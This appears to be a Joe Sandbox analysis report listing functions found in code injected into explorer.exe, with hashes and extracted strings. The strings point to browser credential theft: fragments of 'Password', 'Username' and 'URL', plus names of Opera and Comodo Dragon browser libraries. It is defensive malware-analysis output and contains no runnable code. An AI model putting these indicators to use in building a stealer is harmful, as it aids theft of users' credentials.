                                            • Instruction ID: 07d80b4c3703ff5a3c77fdea614f587c5a558f68e14634427cba2a0925905ddb
                                            • Opcode Fuzzy Hash: ab096684c62b4fa6dee599cd0786e4e5e1695c46f6b37e6d42e0212ff82979dc
                                            • Instruction Fuzzy Hash: 9CB1AD74518B488EDB14EF68C486AEEB7F1FF98300F50461EE49ACB251EF70A445CB86
                                            Function 10355622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                            • API String ID: 0-1539916866
                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction ID: 301e0e3f97ca4aa1d71a0af9acfdf7370db2c61fb7fb9b4965723354cfa78e12
                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction Fuzzy Hash: 6541AF70A18B08CFDF14DF88E4567AD7BE2EB48700F00025EE409D7295DBB5AD498BD6
                                            Function 10ABE622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                            • API String ID: 0-1539916866
                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction ID: 17f859b5641ff4430ee13d7fc7d829a468f27cc9bb73f73aca6cbd295154f4d9
                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction Fuzzy Hash: 9C419070B18B088FDB14DF88A44A6AD7BEAFB48700F00025EE549D7246DBB5AD458BD6
                                            Function 10C08622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                            • API String ID: 0-1539916866
                                            • Opcode ID: d4c0600765e95d9644f3b004760b772fb69c17b8ab6c6f5d70f8b028c9cbfaab
                                            • Instruction ID: 03d87258343684450a9a052f59dfaed347d29a05ddbee74afc6f0cb1ba73fc2c
                                            • Opcode Fuzzy Hash: d4c0600765e95d9644f3b004760b772fb69c17b8ab6c6f5d70f8b028c9cbfaab
                                            • Instruction Fuzzy Hash: 0441B270A18B088FDF54DF88A4466BE7BE2FB88700F00425EE449D3249DB75AD49CBD6
                                            Function 1035CAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                            • API String ID: 0-355182820
                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction ID: 8047931011de98f4c07fdc8dfcf8ed7fcc3fa7ad4b16153ce660abe3032cf3eb
                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction Fuzzy Hash: 22C15B75218B098FC758EF64C496AAAF3E5FB94304F40472EA49AC7260DF70B519CB86
                                            Function 10AC5AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                            • API String ID: 0-355182820
                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction ID: d831fbc6af823746a9c07607847c9add9e2b04da3db12d9ab2d545e9b37bb556
                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction Fuzzy Hash: 8EC15B74218B089BC758EF64C586BEAF3E5FB98304F41462EA49AC7210DF70F655CB86
                                            Function 10C0FAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                            • API String ID: 0-355182820
                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction ID: 484dc7622b0d5404bc289f85038c7f9c75b4ab2ddfe7a41c65d5b5c6d7a218b5
                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction Fuzzy Hash: 55C16C79218B098FC758EF24C49669AF3E1FB98304F40472EA4AEC7251DF70B556CB86
                                            Function 1035CF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                            • API String ID: 0-97273177
                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction ID: 768ec4c277a52466dbaa485c0a9d08c8afa1dc5f5db6a0cfad267d580d82264c
                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction Fuzzy Hash: A651E5305187488FD759DF18D8856AAB7E5FBC4304F501A2EE8CBC7251DBB4A94ACB82
                                            Function 10AC5F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                            • API String ID: 0-97273177
                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction ID: 9b964c45366ef9b8042b9da591c2b7c8c82bcf4fcbf672b188fb386740b7bf11
                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction Fuzzy Hash: 4F51C53451C7488FD709CF18D5817AAB7E5FB85700F515A2EE8CBC7242DBB4A906CB82
                                            Function 103562F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction ID: d42ef21594bc3b1b04b3184bcbd180db13b3950f8e16b942ea39434d8b26837d
                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction Fuzzy Hash: FFC17474618E194FC758EF68D456EAAF3E1FB98300F51432DA44ACB265DF30EA0AC785
                                            Function 103562F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction ID: cd48cd001c6cd8a9a3e0cf484737ed29783558d142fc807ca79566d01dc314ad
                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction Fuzzy Hash: 6AC16474618A194FC758EF68D456EAAF3E1FB98300F51432DA44ACB265DF30E90AC785
                                            Function 10ABF2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction ID: 99fe52448e57a0c15ad1a4895cd7c239d846ed51f86d894bfe93673366c0596a
                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction Fuzzy Hash: 98C19F74618E194FC758EF68D596BAAB3E5FB98300F454329A44AC7254DF30EA02CBC6
                                            Function 10ABF2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction ID: cda095872a8fa2e1fa0f90b984e627efeee961de4b3dc32d82c89c16d08fe123
                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction Fuzzy Hash: 34C1A074618E194FC758EF68D556BAAB3E5FF98300F854329A44AC7250DF30EA02CBC6
                                            Function 10C092F2 Relevance: 10.4, Strings: 8, Instructions: 379COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: 9d30e79ed5fee0c1d5fd49b7b1f5c9184da7817a1b6f87e03f67288e3f9e3d16
                                            • Instruction ID: ed5590bd22e7b59bb21f8a2efd8294e64e7858f2acc3e93ca8ca1ada27168c86
                                            • Opcode Fuzzy Hash: 9d30e79ed5fee0c1d5fd49b7b1f5c9184da7817a1b6f87e03f67288e3f9e3d16
                                            • Instruction Fuzzy Hash: 81C1C279618A198FC748EF68D496AEAB3E1FB98300F504369A41EC7255DF30E941CFC5
                                            Function 10C092F4 Relevance: 10.4, Strings: 8, Instructions: 379COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: bb2c8f803b3550fa1dddcd5262a05046dcfbf91c706a3f07daf5b8b443b65bd7
                                            • Instruction ID: 6a1f2bde1096666a4418ad36a7bd3297ebf0a7e6e8875b8ba32c42cb0fed23ea
                                            • Opcode Fuzzy Hash: bb2c8f803b3550fa1dddcd5262a05046dcfbf91c706a3f07daf5b8b443b65bd7
                                            • Instruction Fuzzy Hash: 24C1C279618A198FC748EF68D496AEAB3E1FB98300F504369A41EC7255DF30E941CFC5
                                            Function 10357CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction ID: a56a746aaba3296d8451832328e2f6f8edea93887f53785c789e235095dd0a2c
                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction Fuzzy Hash: 2CA18F706187488FDB19DFA8D445BEEB7E1FF98300F40462DE48AD7291EF7095498789
                                            Function 10AC0CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction ID: 69e98dcaf632d5d63f57c6b57474136cd0e988d45a71c0e3fbcff44b42b531f9
                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction Fuzzy Hash: 14A1CE706187488FDB19DFA8D544BEEB7E1FF89310F00462DE48AD7251EF7099458789
                                            Function 10C0ACD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: faecd8f0e1efebfa4d9700d0100e626d159805ed599e904fb8c3887653424272
                                            • Instruction ID: 849f1ba8ef4df2586c40b7ebad166554d55010ab8921351b632a0488efe9b87b
                                            • Opcode Fuzzy Hash: faecd8f0e1efebfa4d9700d0100e626d159805ed599e904fb8c3887653424272
                                            • Instruction Fuzzy Hash: 9AA1DE746187488FDB19DFA8D4447EEB7E2FF98300F40462EE48AD7251EE309985CB89
                                            Function 10357CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction ID: 24a493e091eedebcc29f7fe46d806e6a712f154bd31aee9f21db9a7ccbbb0b69
                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction Fuzzy Hash: 9A918E706187488FDB19DFA8D445BEEB7E1FF98300F40462EE48AD7292EF7095498789
                                            Function 10AC0CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction ID: b6a0686a4a9916c2bd2db303e83bf4f9112d4b14e6f37b97ededc771ecfc4a20
                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction Fuzzy Hash: 0891BE706187488FDB18DFA8D544BEEB7E1FF89310F00462EE48AD7241EF7095458789
                                            Function 10C0ACE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: fe1ea33f86d2579ffe451e93606c83392e0fcc259d4d5a21f07e7454e2bd6bba
                                            • Instruction ID: 84760b5e151e96bdfdee1de7b9200f3d08b4bec7a1bb400bbd77db9cd06acd38
                                            • Opcode Fuzzy Hash: fe1ea33f86d2579ffe451e93606c83392e0fcc259d4d5a21f07e7454e2bd6bba
                                            • Instruction Fuzzy Hash: 9491CE74618B488FDB18DFA8D444BEEB7E2FB98300F00462EE48AD7251EF709545CB89
                                            Function 10357352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$e$n$v
                                            • API String ID: 0-1849617553
                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction ID: 60c94e2ad514ce537fe00f05b2d6383915be528c050927faaaf78e65caf1881f
                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction Fuzzy Hash: 9071B5316187498FD759EF68D489BAAB7F0FF58304F00062EE44AC7261EF70E9498B81
                                            Function 10AC0352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$e$n$v
                                            • API String ID: 0-1849617553
                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction ID: d7a8c7a0523ae7c0f00300ec7f6895e7dcab98ad9acc60cdf091df33ae059a73
                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction Fuzzy Hash: 1D71A035618B4D8FD758DFA8C585BAAB7F0FF98304F01062EE44AC7221EB70E9458B81
                                            Function 10C0A352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$e$n$v
                                            • API String ID: 0-1849617553
                                            • Opcode ID: 7828529f2bff13954ce9421705057d3f39e259187ff153fcc95431a1d4029c81
                                            • Instruction ID: c6931eea0d7a592ecaf9c427425f09c7d9db727e7ddc861e38261b35c0f32c6a
                                            • Opcode Fuzzy Hash: 7828529f2bff13954ce9421705057d3f39e259187ff153fcc95431a1d4029c81
                                            • Instruction Fuzzy Hash: FE71A375618B488FD759DFA8C4856AAB7F1FF98304F00062EE44ACB221EF70E945CB85
                                            Function 10352C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                            • API String ID: 0-1970020201
                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction ID: 4b4a7b8bf5e1783a95138e3ff3eaafa0d12edea78c092b50f44e1c873225b888
                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction Fuzzy Hash: 17513DB0914B4C8FDB64EF64C045AEEB7F1FF58300F40462EA49AE7214EF70A5458B99
                                            Function 10ABBC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                            • API String ID: 0-1970020201
                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction ID: c96a56b92cac654538cff1bcf5e51ae884fce2105fa92e21281f91ac0340d576
                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction Fuzzy Hash: 67515CB0918B4C8BDB55DFA4C045BEEB7F1FF58300F41462EA59AE7214EF70A5418B89
                                            Function 10C05C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                            • API String ID: 0-1970020201
                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction ID: 55384dd20132c66e3af97844be3ebd219ce4a21824c063b904e5010ef625ee98
                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction Fuzzy Hash: A2515CB4918B4C8BDB55DFA4C045AEAB7E1FF58300F40462EA89AE7214EF70A541DB89
                                            Function 1035386F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4$\$dll$ion.$vers
                                            • API String ID: 0-1610437797
                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction ID: 55169ecf93228e841bd17c1c60a9eb76a22d67fca956ee9e400a42d1cbddba01
                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction Fuzzy Hash: 03417634218B8C8FCBA5EF24D845BEAB3E4FB98301F51462E949EC7250EF30D5498782
                                            Function 10ABC86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4$\$dll$ion.$vers
                                            • API String ID: 0-1610437797
                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction ID: 9597195cd30f26580dc3d8394fa87803d5003bc4fdf0403f3fc633ee9882033f
                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction Fuzzy Hash: A3419534218B4C8FCBA5DF249845BEAB7E5FB99341F41462E985EC7240EF30E90587C2
                                            Function 10C0686F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4$\$dll$ion.$vers
                                            • API String ID: 0-1610437797
                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction ID: 0c73502685981c8b7c0b6f67ea2a5c64f8a810f0820999c93794db3a710631fd
                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction Fuzzy Hash: 8F418135218B8C8FCBA5EF2498457EA73E4FB98301F51462EA85ECB245EF34D545CB82
                                            Function 103554B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 32.d$cli.$dll$sspi$user
